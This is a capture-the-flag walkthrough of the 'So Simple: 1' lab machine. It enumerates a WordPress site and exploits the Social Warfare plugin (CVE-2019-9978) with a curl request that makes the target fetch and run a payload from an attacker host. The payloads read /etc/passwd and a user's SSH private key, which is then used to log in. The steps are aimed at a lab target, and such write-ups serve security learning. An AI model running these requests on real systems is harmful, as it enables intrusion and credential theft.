So Simple: 1 Walkthrough
reference | So Simple: 1 |
target ip | 192.168.1.10 |
Scan with nmap
:

SSH only support publickey auth method.
No need to hydra
SSH service.

Enumerate HTTP service with gobuster
:

Enumerate WordPress with wpscan
:
1 | wpscan --url http://192.168.1.10/wordpress --no-banner |

Original exploit is hash3liZer/CVE-2019-9978 and Social Warfare <= 3.5.2 - Unauthenticated Remote Code Execution (RCE).
Here I use curl
to make it clearer.
1 | <pre>system('cat /etc/passwd')</pre> |
Exploit:
1 | curl -s http://192.168.1.10/wordpress/wp-admin/admin-post.php\?swp_debug\=load_options\&swp_url\=http://192.168.1.89:8000/payload.txt |

There are two users (max and steven).
Try to enumerate ssh private key, since SSH service only allows publickey auth method.
www-data
has the privilege to view the content of /home/max/.ssh/id_rsa
, which can be used to login via SSH.
1 | <pre>system('cat /home/max/.ssh/id_rsa')</pre> |
Exploit again:
1 | curl -s http://192.168.1.10/wordpress/wp-admin/admin-post.php\?swp_debug\=load_options\&swp_url\=http://192.168.1.89:8000/payload.txt |

Copy and save to local file, chmod 400 ./max.id_rsa
.

/home/max/user.txt
:

Privilege escalation from user max to user steven:

/home/steven/user2.txt
:

Privilege escalation from user steven to user root:

There’s no /opt/tools
, mkdir
first.
Then place any commands you want to run as root:

/root/root.txt
:

http://192.168.1.10/wordpress/wp-content/uploads/simple-file-list/

Related exploit is WordPress Plugin Simple File List 5.4 - Remote Code Execution.
But there’s no http://192.168.1.10/wordpress//wp-content/plugins/simple-file-list/ee-upload-engine.php
and http://192.168.1.10/wordpress//wp-content/plugins/simple-file-list/ee-file-engine.php
.
/home/max/personal.txt

/home/max/this

nonsense